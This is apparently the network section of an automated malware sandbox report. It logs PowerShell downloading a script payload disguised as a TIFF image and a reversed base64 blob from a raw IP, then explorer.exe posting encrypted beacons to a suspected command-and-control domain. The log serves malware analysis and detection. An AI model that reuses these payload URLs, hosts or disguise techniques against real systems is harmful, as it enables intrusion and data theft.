                                                                                                                        Oct 23, 2024 08:15:44.906867027 CEST804998045.91.8.152192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:44.906975985 CEST804998045.91.8.152192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:44.907008886 CEST804998045.91.8.152192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:44.907063007 CEST804998045.91.8.152192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:44.907080889 CEST4998080192.168.2.1045.91.8.152
                                                                                                                        Oct 23, 2024 08:15:44.907099009 CEST804998045.91.8.152192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:44.907111883 CEST4998080192.168.2.1045.91.8.152
                                                                                                                        Oct 23, 2024 08:15:44.907131910 CEST804998045.91.8.152192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:44.907233953 CEST4998080192.168.2.1045.91.8.152
                                                                                                                        Oct 23, 2024 08:15:47.705466986 CEST4998180192.168.2.1045.91.8.152
                                                                                                                        Oct 23, 2024 08:15:47.710921049 CEST804998145.91.8.152192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:47.711031914 CEST4998180192.168.2.1045.91.8.152
                                                                                                                        Oct 23, 2024 08:15:47.711318016 CEST4998180192.168.2.1045.91.8.152
                                                                                                                        Oct 23, 2024 08:15:47.711342096 CEST4998180192.168.2.1045.91.8.152
                                                                                                                        Oct 23, 2024 08:15:47.716733932 CEST804998145.91.8.152192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:47.716805935 CEST804998145.91.8.152192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:48.833766937 CEST804998145.91.8.152192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:48.908087015 CEST4998180192.168.2.1045.91.8.152
                                                                                                                        Oct 23, 2024 08:15:49.619543076 CEST4998180192.168.2.1045.91.8.152
                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Oct 23, 2024 08:14:50.368208885 CEST6398953192.168.2.101.1.1.1
                                                                                                                        Oct 23, 2024 08:14:50.375320911 CEST53639891.1.1.1192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:51.604723930 CEST5266553192.168.2.101.1.1.1
                                                                                                                        Oct 23, 2024 08:14:51.612602949 CEST53526651.1.1.1192.168.2.10
                                                                                                                        Oct 23, 2024 08:15:41.547200918 CEST5845953192.168.2.101.1.1.1
                                                                                                                        Oct 23, 2024 08:15:41.789638996 CEST53584591.1.1.1192.168.2.10
                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                        Oct 23, 2024 08:14:50.368208885 CEST192.168.2.101.1.1.10x36e2Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                        Oct 23, 2024 08:14:51.604723930 CEST192.168.2.101.1.1.10x1aafStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                        Oct 23, 2024 08:15:41.547200918 CEST192.168.2.101.1.1.10xab06Standard query (0)prolinice.gaA (IP address)IN (0x0001)false
                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                        Oct 23, 2024 08:14:50.375320911 CEST1.1.1.1192.168.2.100x36e2No error (0)drive.google.com142.250.186.78A (IP address)IN (0x0001)false
                                                                                                                        Oct 23, 2024 08:14:51.612602949 CEST1.1.1.1192.168.2.100x1aafNo error (0)drive.usercontent.google.com142.250.185.193A (IP address)IN (0x0001)false
                                                                                                                        Oct 23, 2024 08:15:41.789638996 CEST1.1.1.1192.168.2.100xab06No error (0)prolinice.ga45.91.8.152A (IP address)IN (0x0001)false
                                                                                                                        • drive.google.com
                                                                                                                        • drive.usercontent.google.com
                                                                                                                        • 172.245.135.166
                                                                                                                        • wvhejqgucymxstkj.com
                                                                                                                          • prolinice.ga
                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        0192.168.2.1049732172.245.135.166807848C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Oct 23, 2024 08:14:43.411932945 CEST329OUTGET /600/seethebestthingsentiretimewithgreatthignstoebe.tIF HTTP/1.1
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                        Host: 172.245.135.166
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Oct 23, 2024 08:14:44.091351986 CEST1236INHTTP/1.1 200 OK
                                                                                                                        Date: Wed, 23 Oct 2024 06:14:43 GMT
                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                        Last-Modified: Tue, 22 Oct 2024 16:50:51 GMT
                                                                                                                        ETag: "2251a-625139265a26b"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 140570
                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: image/tiff
                                                                                                                        Data Raw: ff fe 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 43 00 72 00 65 00 61 00 74 00 65 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 28 00 77 00 73 00 6d 00 61 00 6e 00 2c 00 20 00 63 00 6f 00 6e 00 53 00 74 00 72 00 2c 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2c 00 20 00 6d 00 61 00 73 00 63 00 75 00 6c 00 69 00 6e 00 69 00 64 00 61 00 64 00 65 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 68 00 79 00 70 00 6f 00 67 00 6c 00 6f 00 73 00 73 00 61 00 46 00 6c 00 61 00 67 00 73 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 63 00 6f 00 6e 00 4f 00 70 00 74 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 68 00 79 00 70 00 6f 00 67 00 6c 00 6f 00 73 00 73 00 61 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 61 00 75 00 74 00 68 00 56 00 61 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 56 00 61 00 6c 00 [TRUNCATED]
                                                                                                                        Data Ascii: private function CreateSession(wsman, conStr, optDic, masculinidade) dim hypoglossaFlags dim conOpt dim hypoglossa dim authVal dim encodingVal dim encryptVal dim pw dim tout ' proxy information dim proxyAccessType dim proxyAccessTypeVal dim proxyAuthenticationMechanism dim proxyAuthenticationMechanismVal dim proxyUsername dim proxyPassword hypoglossaFlags = 0 proxy
                                                                                                                        Oct 23, 2024 08:14:44.091387987 CEST1236INData Raw: 00 41 00 63 00 63 00 65 00 73 00 73 00 54 00 79 00 70 00 65 00 20 00 3d 00 20 00 30 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 41 00 63 00 63 00 65 00 73 00 73 00 54 00 79 00 70 00 65 00 56 00 61 00 6c 00 20 00 3d 00 20
                                                                                                                        Data Ascii: AccessType = 0 proxyAccessTypeVal = 0 proxyAuthenticationMechanism = 0 proxyAuthenticationMechanismVal = 0
                                                                                                                        Oct 23, 2024 08:14:44.091398954 CEST424INData Raw: 00 28 00 65 00 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 56 00 61 00 6c 00 29 00 20 00 3d 00 20 00 22 00 75 00 74 00 66 00 2d 00 38 00 22 00 20 00 74 00 68 00 65 00 6e 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20
                                                                                                                        Data Ascii: (encodingVal) = "utf-8" then hypoglossaFlags = hypoglossaFlags OR wsman.SessionFlagUTF8 else
                                                                                                                        Oct 23, 2024 08:14:44.091475010 CEST24INData Raw: 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 65
                                                                                                                        Data Ascii: " e
                                                                                                                        Oct 23, 2024 08:14:44.091543913 CEST1236INData Raw: 00 6e 00 64 00 20 00 69 00 66 00 0d 00 0a 00 20 00 20 00 20 00 20 00 65 00 6e 00 64 00 20 00 69 00 66 00 0d 00 0a 00 0d 00 0a 00 20 00 20 00 20 00 20 00 69 00 66 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65
                                                                                                                        Data Ascii: nd if end if if optDic.ArgumentExists(NPARA_UNENCRYPTED) then ASSERTBOOL optDic.ArgumentExists(NPARA
                                                                                                                        Oct 23, 2024 08:14:44.091553926 CEST212INData Raw: 00 6c 00 61 00 67 00 73 00 20 00 4f 00 52 00 20 00 77 00 73 00 6d 00 61 00 6e 00 2e 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 46 00 6c 00 61 00 67 00 55 00 73 00 65 00 53 00 73 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 65 00 6e 00 64 00 20
                                                                                                                        Data Ascii: lags OR wsman.SessionFlagUseSsl end if if optDic.ArgumentExists(NPARA_AUTH) then AS
                                                                                                                        Oct 23, 2024 08:14:44.091566086 CEST1236INData Raw: 00 53 00 45 00 52 00 54 00 4e 00 41 00 4c 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 41 00 55 00 54 00 48 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 61 00 75 00 74 00 68 00 56 00 61 00 6c 00 20 00 3d 00 20 00 6f 00 70
                                                                                                                        Data Ascii: SERTNAL(NPARA_AUTH) authVal = optDic.Argument(NPARA_AUTH) select case LCase(authVal) case
                                                                                                                        Oct 23, 2024 08:14:44.091578007 CEST212INData Raw: 00 61 00 6c 00 69 00 64 00 20 00 66 00 6f 00 72 00 20 00 27 00 2d 00 61 00 75 00 74 00 68 00 3a 00 6e 00 6f 00 6e 00 65 00 27 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 63 00 61 00 73 00 65 00 20
                                                                                                                        Data Ascii: alid for '-auth:none'" case VAL_BASIC 'Use -username and -password.
                                                                                                                        Oct 23, 2024 08:14:44.091753960 CEST1236INData Raw: 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 41 00 53 00 53 00 45 00 52 00 54 00 42 00 4f 00 4f 00 4c 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73
                                                                                                                        Data Ascii: ASSERTBOOL optDic.ArgumentExists(NPARA_USERNAME), "The '-" & NPARA_USERNAME & "' option must be specified for
                                                                                                                        Oct 23, 2024 08:14:44.091764927 CEST212INData Raw: 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 41 00 53 00 53 00 45 00 52 00 54 00 42 00 4f 00 4f 00 4c 00 20 00 6e 00 6f 00 74 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45
                                                                                                                        Data Ascii: ASSERTBOOL not optDic.ArgumentExists(NPARA_CERT), "The '-" & NPARA_CERT & "' option is not valid
                                                                                                                        Oct 23, 2024 08:14:44.096703053 CEST1236INData Raw: 00 20 00 66 00 6f 00 72 00 20 00 27 00 2d 00 61 00 75 00 74 00 68 00 3a 00 64 00 69 00 67 00 65 00 73 00 74 00 27 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 68 00 79 00 70
                                                                                                                        Data Ascii: for '-auth:digest'" hypoglossaFlags = hypoglossaFlags OR wsman.SessionFlagCredUsernamePassword OR wsman


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        1192.168.2.1049913172.245.135.166806124C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Oct 23, 2024 08:15:16.403307915 CEST79OUTGET /600/ERFCEE.txt HTTP/1.1
                                                                                                                        Host: 172.245.135.166
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Oct 23, 2024 08:15:17.064065933 CEST1236INHTTP/1.1 200 OK
                                                                                                                        Date: Wed, 23 Oct 2024 06:15:16 GMT
                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                        Last-Modified: Tue, 22 Oct 2024 16:48:03 GMT
                                                                                                                        ETag: "c558-625138867f6e1"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 50520
                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: text/plain
                                                                                                                        Data Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                                                                                        Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                        Oct 23, 2024 08:15:17.064143896 CEST224INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                        Oct 23, 2024 08:15:17.064153910 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                        Oct 23, 2024 08:15:17.064184904 CEST212INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                        Oct 23, 2024 08:15:17.064248085 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                        Oct 23, 2024 08:15:17.064295053 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                        Oct 23, 2024 08:15:17.064316034 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                        Oct 23, 2024 08:15:17.064446926 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                        Oct 23, 2024 08:15:17.064459085 CEST848INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                        Oct 23, 2024 08:15:17.064471006 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                        Oct 23, 2024 08:15:17.070723057 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        2192.168.2.104998045.91.8.152803968C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Oct 23, 2024 08:15:41.796554089 CEST282OUTPOST /index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://wvhejqgucymxstkj.com/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 136
                                                                                                                        Host: prolinice.ga
                                                                                                                        Oct 23, 2024 08:15:41.796554089 CEST136OUTData Raw: 6e e2 e1 8b c3 47 f5 12 1a 17 b3 17 3d 2c f9 f3 a5 20 e8 24 45 f8 cc e2 f4 e8 04 6b d8 3b 46 00 35 b9 eb b0 0c ac f4 a2 12 be c4 f2 87 a1 2e 58 95 24 5d 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 3a bc 52 ee cc 59 3b 1f d6 b3 50 4c 85 11 b4 f5 ab
                                                                                                                        Data Ascii: nG=, $Ek;F5.X$]H8.6hEv:RY;PL4>Wwg5}VHHO0U^=li#SC/q
                                                                                                                        Oct 23, 2024 08:15:42.990777969 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                        date: Wed, 23 Oct 2024 06:15:42 GMT
                                                                                                                        server: Apache/2.4.59 (Debian)
                                                                                                                        transfer-encoding: chunked
                                                                                                                        content-type: text/html; charset=utf-8
                                                                                                                        Data Raw: 33 37 44 33 0d 0a 84 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 4d 93 dc e5 25 0a ed e2 44 4a 3b 47 a5 77 e3 2c 25 29 67 7b b4 1d 52 9a 46 7a 54 8c 7e 72 ec d5 7e f4 44 cf b3 6b eb a7 41 63 d4 4a be ec 6e e8 4b 42 15 65 fa 28 3b 12 b5 17 01 51 60 01 78 3a 91 7f 32 8b 47 78 ce d5 ea f0 7b d0 1e 45 fe 16 dc 84 fa d9 be 93 bd db 4a 1d 9f ac 79 dd 2f b5 84 79 6d 21 b3 90 51 dc c2 a5 14 5d bd 12 b6 4b 00 ca 2c 05 00 7c e1 f7 57 09 03 02 00 09 00 9e 03 00 00 53 1f 7d 22 77 32 62 71 76 3f 4f 55 52 12 42 00 c9 32 ee 68 fe 0f ca 76 74 07 d6 d6 f9 b8 92 29 e8 55 92 92 3e c8 50 dd 24 a4 99 ce 5c 90 b9 3b fc 51 49 c0 0d f0 19 d3 e9 92 2a 7a f7 09 00 bb 7a b8 01 84 b7 a3 64 8b 0b f3 9f 79 57 fa 26 ce 46 fb 76 8c c7 a7 e0 22 d1 2d c9 1e 43 c3 ef c1 4c dd a0 af 3d b8 a8 a5 fb c0 70 8e 98 0e df 4b cc 40 42 f2 70 5e a2 6b 51 b2 9f 66 73 fe c7 15 ac cd f6 9d 88 6a 44 07 1e 8d 8b 6b 24 18 2b 4b 2a ec 81 b7 50 50 a4 4e ad cf 32 5c c0 15 b4 57 90 1b 0d ee 6c f7 54 23 c9 ed 8e bc 36 a0 b4 7a c0 [TRUNCATED]
                                                                                                                        Data Ascii: 37D3_'!yS5&M%DJ;Gw,%)g{RFzT~r~DkAcJnKBe(;Q`x:2Gx{EJy/ym!Q]K,|WS}"w2bqv?OURB2hvt)U>P$\;QI*zzdyW&Fv"-CL=pK@Bp^kQfsjDk$+K*PPN2\WlT#6zbRKZ :D?UkKc'O?i@i3E| [}S2TqL L7@x!F*Ex{4@h;pg_Q@[N2*H%s;"r21LVRvo9bN|P,ds,^L+j m.&>g!=/r:l_U*kH >(OAO|q;@+o%Snnq nU[f&C5GT] T]>g{v[ySzB8IX<\r}23:=;HX>H+exij=Ou`'p3|JY=R^Xo[#kn^T-la@9>$z|kXv6]O8Rp|otzAY2u-jk75HwbEIrBG`yDvWR0md9n/oc$7;KC?iT6cTD/m#R|~YrM [TRUNCATED]
